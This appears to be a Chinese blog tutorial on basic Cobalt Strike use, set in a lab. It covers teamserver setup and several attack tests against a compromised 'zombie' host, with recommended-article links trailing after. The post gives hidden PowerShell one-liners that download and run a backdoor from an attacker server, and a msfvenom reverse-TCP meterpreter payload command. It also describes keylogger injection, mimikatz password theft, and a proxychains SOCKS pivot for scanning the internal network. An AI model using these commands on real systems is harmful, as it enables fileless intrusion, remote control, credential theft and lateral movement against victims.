cobaltstrike基本使用

最新推荐文章于 2024-05-12 03:52:51 发布
最新推荐文章于 2024-05-12 03:52:51 发布
阅读量4.3k 收藏 3
点赞数
文章标签: 网络协议 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50574090/article/details/123254528
版权

server安装(Ubuntu18.04) 

服务器: 192.168.1.173     test/magic123

1准备java环境

apt install default-jre

apt install openjdk-11-jre-headless

2.启动服务

chmod 755 teamserver

./teamserver IP Passwd

3.启动客户端

环境  windows7   192.168.1.154   Song/123456

3.1准备好java环境

管理员权限运行.bat,输入serverIP和密码(用户名自定义)

 

 A攻击测试:powershell无文件攻击

1.制作无文件后门(此处是powershell无文件后门)

 

或者

 

 制作一句话执行后门,比如

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.173:82/'))"

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.173:80/atest'))"

2.去肉鸡上cmd执行这句powershell,和cobaltstrike建立连接,进行提权操作

 

3.列出进程列表,选择一个进程注入,执行keylogger

 

4.利用cs上的minikatz进行密码获取

 

B攻击测试:exe集成后门

制作后门msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.25  LPORT=4444 -f exe > shell.exe

kali攻击端

 

提权后(进入meterpreter)

执行shell

执行systeminfo

C.artifact.exe敏感文件后门测试

直接生成后门,上传到肉鸡上

D.socket网络代理后门测试

1.在cobaltstrike已有的beacon上建立socket代理

 

2.在攻击机上(kali)配置socket4(或者socket5)的IP和端口

vim /etc/proxychains.conf

3.在攻击机器上进行肉鸡所在网段的扫描

proxychains nmap -sP 192.168.1.0/24

 

pick我一下.
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ubuntu-16.04 安装jdk和Clbalt Strike
Nginx521的博客
02-23 606
jdk11、java、cobaltstrike、cs
CobaltStrike项目实战
永远相信美好的事情即将发生
05-14 620
模拟内网有三台机器:WEB、PC和DC。WEB服务器有两个网络适配器,适配器1处于NAT模式用于连接外网,适配器2用于内网。PC和WEB服务器一样,有两个适配器,能够同时访问外网和内网;DC作为域控制器,只有一个适配器,仅内网访问。
powershell免杀思路分析
mingyqf的博客
12-14 2640
powershell免杀思路分析 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难。在经过各种变形、加密、混淆、恶意文件放在远程服
2024年网络安全最新CobaltStrike的安装及使用实验(保姆级教程),2024年最新驱动核心源码详解和Binder超系统学习资源
最新发布
2401_84302655的博客
05-12 1009
它是一款以 Metasploit 为基础的 GUI 的框架式渗透工具,集成了端口转发、服务扫描、自动化溢出、多模式端口监听、Winexe 木马生成、Win dll 木马生成、Java 木马生成、office 宏病毒生成、木马捆绑等;对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
Cobaltstrike系列教程(九)内置Socks与神器EW
J0o1ey Blog
01-19 7014
0x001-Socks概念 目前利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等...
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ...2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
cobaltstrike中文版.zip
05-17
cobaltstrike中文版.zip
cobalt strike 4.7
06-07
cobalt strike 4.7
Cobalt Strike 4.5
09-21
Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名...
Cobalt Strike详细使用教程
小小猪的博客
12-16 7014
Cobalt Strike详细使用教程 Cobalt Strike安装教程这里就不在赘述了 Cobalt Strike安装教程 监听器 listner: 创建监听器 Add 添加新的监听 edit 编辑已有监听 remove 删除监听 restart 重启监听 要添加监听器可以点击Add,这里的监听器根据所通过的协议和监听器位置分为8种 不同监听介绍: 1.beacon dns 2.beacon http 3.beacon https 4.beacon smb 5.bea..
无文件落地免杀的初尝试思考(上)
wjwqp的专栏
07-23 597
我们通过BarrettAdams师傅GitHub里面的代码分析,我们发现免杀的本质还是加密与混淆;我们通过底层函数的调用与"位图"的RNG隐藏躲避了def检测,那我们把这个数据流在进行Base64加密后执行呢?我们把这个数字流通过”+“或者函数拼接呢?又或者我们改用其他不那么敏感的函数调用呢?或者用音频或者视频隐写呢?因为笔者也是初次尝试无文件落地免杀,所以难免有一些疏漏。如果存在问题,欢迎大家在评论区指正。作者面包and牛奶,文章转载于FreeBuf.COMhttpshttpshttps。...
powershell cs上线_从SQL注入到Cobalt Strike上线
weixin_39550410的博客
11-21 1076
介绍在这篇文章中,我将指导您如何在SQL注入中使用XP_CMDSHELL上线Cobalt Strike。为了解决这个问题,我们首先需要设置一个工作环境为此,我们将使用安装了HACKME Bank的windowsserver2003。请参考这引导你开始跑步。一旦您成功地在WindowsServer2003虚拟机上安装了HackMeBank,您将需要安装一些附加的服务包,以便在该计算机上运行...
Cobalt Strike使用教程——基础篇
热门推荐
Captain_RB的博客
06-10 1万+
本文主要介绍 **Cobalt Strike** 4.3 的基本功能及使用方法
powershell运行powershell方法总结
蚁景网安学院
11-25 671
今天给大家带来的是,无powershell运行powershell的一些姿势的分享,由于powershell的特性,使得它很受渗透测试爱好者的喜爱,当然也催生了像ASMI之类的防御手段,...
我的powershell免杀之路
weixin_43939009的博客
07-11 1154
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。 / 这次我将结合前人的各种骚操作,以及个人的不断试错,所想所思,来写一篇关于powershell来进行免杀,达到CS多种姿势绕过AV
Cobaltstrike学习(五)Socks/Proxifier
kang_12358的博客
08-24 2679
(一)Socks概念 利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等的接入。 SOCKS 提供一个通用框架来使这些协议安全透明地穿过防火墙。(节选百度百科) 简单来说就是把本机和目标机器通过Socks协议开启一个安全不受防火墙拦截的通道。 1、Cobaltstrike自带Socks功能 在目标会话上右击-->...
Cobaltstrike安装,免杀,使用
逆向萌新的博客
07-06 1273
Cobaltstrike安装,免杀,使用
cobaltstrike使用
09-14
为了使用CobaltStrike工具,首先需要安装Java环境。根据引用中的信息,在Kali系统上使用jdk11,在两台Windows 7系统上使用jdk1.8。 使用CobaltStrike的详细步骤如下: 1. 启动CobaltStrike团队服务器,可以使用命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值